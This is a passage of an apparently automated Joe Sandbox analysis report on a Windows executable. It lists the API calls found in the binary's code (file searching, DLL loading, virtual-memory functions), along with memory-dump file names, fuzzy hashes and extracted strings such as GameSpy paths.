                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$AddressDiskFreeHandleModuleProcSpace
                                                                                                                        • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                                        • API String ID: 3160920872-3712701948
                                                                                                                        • Opcode ID: b81541dc3e96a0be4577df6b92fbd7b30589bb316c3bcf877a1cbfb86ccf1b4f
                                                                                                                        • Instruction ID: 7ad7b93e94fca053afe9f72b981c6a2b3715ccf3ef72a9c3208e8f43e9ae2302
                                                                                                                        • Opcode Fuzzy Hash: b81541dc3e96a0be4577df6b92fbd7b30589bb316c3bcf877a1cbfb86ccf1b4f
                                                                                                                        • Instruction Fuzzy Hash: 13214336208302AFC311DF65D804F9B77E4BB96304F05897EF581A2150EA74D508CBA7
                                                                                                                        APIs
                                                                                                                        • SetErrorMode.KERNEL32(00000003,dll,?,?,774D0F00,00414AE2,?), ref: 004148DE
                                                                                                                        • LoadLibraryA.KERNEL32(?), ref: 004148E7
                                                                                                                        • GetProcAddress.KERNEL32(00000000,DllRegisterServer), ref: 00414902
                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 0041490F
                                                                                                                        • SetErrorMode.KERNEL32(00000000), ref: 00414916
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLibraryMode$AddressFreeLoadProc
                                                                                                                        • String ID: DllRegisterServer$dll
                                                                                                                        • API String ID: 2523496102-3743520154
                                                                                                                        • Opcode ID: ef9ba2a5713ceb03e6ce70ee764b4726849faacc317d9aed7e31cc120d4455a1
                                                                                                                        • Instruction ID: 5463a6723183e0fd2573a7326bb506f65ba7a9fbe54e5d5f4bd9aa869cd4d228
                                                                                                                        • Opcode Fuzzy Hash: ef9ba2a5713ceb03e6ce70ee764b4726849faacc317d9aed7e31cc120d4455a1
                                                                                                                        • Instruction Fuzzy Hash: 7BE06C773812242B85116BE97C099CBF79CDFD77727024033FA00D3111CA65984596B9
                                                                                                                        APIs
                                                                                                                        • FindNextFileA.KERNEL32(00000000,0040F4C0), ref: 004158C6
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 004158D5
                                                                                                                        • FindFirstFileA.KERNEL32(?,0040F4C0), ref: 0041592D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$File$CloseFirstNext
                                                                                                                        • String ID: *.*
                                                                                                                        • API String ID: 3541575487-438819550
                                                                                                                        • Opcode ID: 21b5e472a939dc88e613e68adea4ee27e28d7efdd7dda9c45b768cfd0e207bba
                                                                                                                        • Instruction ID: 82c4c8625ec48b706e964f5defe62e3f166b5be27307af7ce1f69a47df756571
                                                                                                                        • Opcode Fuzzy Hash: 21b5e472a939dc88e613e68adea4ee27e28d7efdd7dda9c45b768cfd0e207bba
                                                                                                                        • Instruction Fuzzy Hash: 9971B771208B86CBC725CB249450BFBB7E9BFC6345F544A2EE8CA87201DB359846C797
                                                                                                                        APIs
                                                                                                                        • FindNextFileA.KERNEL32(00000000,?), ref: 004146D5
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0041472B
                                                                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 0041478D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$File$CloseFirstNext
                                                                                                                        • String ID: *.*
                                                                                                                        • API String ID: 3541575487-438819550
                                                                                                                        • Opcode ID: ff1870f39b35a9e64cf155c50654656466c85049f1f2ce81a176109cbe950176
                                                                                                                        • Instruction ID: 664cd25a3782574f27417e97decbe08ee3e65bcafea3b4704871a912b5d67fad
                                                                                                                        • Opcode Fuzzy Hash: ff1870f39b35a9e64cf155c50654656466c85049f1f2ce81a176109cbe950176
                                                                                                                        • Instruction Fuzzy Hash: 9D5114355087C58BD721DF2498247EBB7E5FFD2342F18492AE8C587340EB38988AC795
                                                                                                                        APIs
                                                                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 0040AC64
                                                                                                                        • FindNextFileA.KERNEL32(00000000,?), ref: 0040ACB5
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0040AD05
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$File$CloseFirstNext
                                                                                                                        • String ID: %s\%s$%s\Arcade*.exe$%s\GameSpy
                                                                                                                        • API String ID: 3541575487-1719408586
                                                                                                                        • Opcode ID: d67195a3238f5f57d1dd2343961741220b1b4093bba5da21d9414279efcebce8
                                                                                                                        • Instruction ID: ba2843077a888f8c0d9f31af973d8caf28e7bd1786c0ac93db22295fa0225a35
                                                                                                                        • Opcode Fuzzy Hash: d67195a3238f5f57d1dd2343961741220b1b4093bba5da21d9414279efcebce8
                                                                                                                        • Instruction Fuzzy Hash: 0B21E5721083006BE320EB90DC45FEB739DEBC4301F44892FBA55561C1EBBC620986AB
                                                                                                                        APIs
                                                                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 004142A8
                                                                                                                        • FindClose.KERNEL32(00000000,00000000,?,Found! (FileExists),00000000), ref: 004142D9
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00414301
                                                                                                                        Strings
                                                                                                                        • FindFirstFile returned INVALID_HANDLE_VALUE, xrefs: 00414323
                                                                                                                        • File is a directory (FileExists), xrefs: 004142F3
                                                                                                                        • Found! (FileExists), xrefs: 004142CB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$Close$FileFirst
                                                                                                                        • String ID: File is a directory (FileExists)$FindFirstFile returned INVALID_HANDLE_VALUE$Found! (FileExists)
                                                                                                                        • API String ID: 3046750681-696252916
                                                                                                                        • Opcode ID: 9358b9d398efbeaedbf88955095f5e19847b83186bca4ece126a06245336cc21
                                                                                                                        • Instruction ID: f179452c76eb578ae544a1bee184078c8abbbeec53593ee830497973ded0bfe5
                                                                                                                        • Opcode Fuzzy Hash: 9358b9d398efbeaedbf88955095f5e19847b83186bca4ece126a06245336cc21
                                                                                                                        • Instruction Fuzzy Hash: 9C014E363812102AD5203B15AC16FEB67549BD7735F14002BFDA8B72D1C17E204ED67D
                                                                                                                        APIs
                                                                                                                        • _TranslateName.LIBCMT ref: 00430772
                                                                                                                        • _TranslateName.LIBCMT ref: 004307BB
                                                                                                                        • IsValidCodePage.KERNEL32(00000000,00000082,00000000,004562C0,0042635F,?,004809CC,?,?,00000000,?), ref: 0043081F
                                                                                                                        • IsValidLocale.KERNEL32(00000001), ref: 00430835
                                                                                                                          • Part of subcall function 00430605: EnumSystemLocalesA.KERNEL32(0043021B,00000001,00000000,004562C0,0042635F,?,004809CC,?,?,00000000,?), ref: 00430625
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: NameTranslateValid$CodeEnumLocaleLocalesPageSystem
                                                                                                                        • String ID: Norwegian-Nynorsk
                                                                                                                        • API String ID: 25477102-461349085
                                                                                                                        • Opcode ID: 1d989896bc01b99306157691cb7343851a378502ff2dffd7fc8ab0248d4c7af6
                                                                                                                        • Instruction ID: 2f20a2206e1c076148d7ff7e681dfdc67b3553f714d7ef80d5f25f58bdb4048b
                                                                                                                        • Opcode Fuzzy Hash: 1d989896bc01b99306157691cb7343851a378502ff2dffd7fc8ab0248d4c7af6
                                                                                                                        • Instruction Fuzzy Hash: 7B4119716112409BD7B0AF619CB1A2F37E0AF49300F156A3FE541963A1E72CB84DCB6E
                                                                                                                        APIs
                                                                                                                        • VirtualQuery.KERNEL32(?,?,0000001C), ref: 00424096
                                                                                                                        • GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 004240A7
                                                                                                                        • VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C), ref: 004240ED
                                                                                                                        • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,0000001C), ref: 0042412B
                                                                                                                        • VirtualProtect.KERNEL32(?,?,?,?,?,?,0000001C), ref: 00424151
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Virtual$Query$AllocInfoProtectSystem
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4136887677-0
                                                                                                                        • Opcode ID: f92df4dc610bf4f209ae5d1d387623058e6c3484833d4ddbf4b0e73c3023e66a
                                                                                                                        • Instruction ID: 3ae70e2e835963f036367eda34e548a546d7b1799bd96947dc5649064c90c0b6
                                                                                                                        • Opcode Fuzzy Hash: f92df4dc610bf4f209ae5d1d387623058e6c3484833d4ddbf4b0e73c3023e66a
                                                                                                                        • Instruction Fuzzy Hash: 7531D476E00229ABDF10CBA4ED499EDBBB8EB45354F540066E901E3241D7348E91CB98
                                                                                                                        APIs
                                                                                                                        • __lock.LIBCMT ref: 0042D875
                                                                                                                          • Part of subcall function 00429838: EnterCriticalSection.KERNEL32(?,?,?,00423F79,00000004,0044C938,0000000C,00423FDD,000000E0,00424008,?,004369E6,?,?,?,00443BF8), ref: 00429860
                                                                                                                        • GetTimeZoneInformation.KERNEL32(00480CC0,0044D5E0,00000018,0042DE77,0044D5F0,00000008,00429464,?,?,0000003C,00000000,?,?,0000003C,00000000,?), ref: 0042D986
                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00480CC4,000000FF,0000003F,00000000,?,?,0000003C,00000000,?,?,0000003C,00000000,?,00000001), ref: 0042DA14
                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00480D18,000000FF,0000003F,00000000,?,?,0000003C,00000000,?,?,0000003C,00000000,?,00000001), ref: 0042DA48
                                                                                                                          • Part of subcall function 0042400B: __lock.LIBCMT ref: 00424029
                                                                                                                          • Part of subcall function 0042400B: HeapFree.KERNEL32(00000000,?,0044C948,0000000C,0042981C,00000000,0044CDF0,00000008,00429851,?,?,?,00423F79,00000004,0044C938,0000000C), ref: 00424070
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
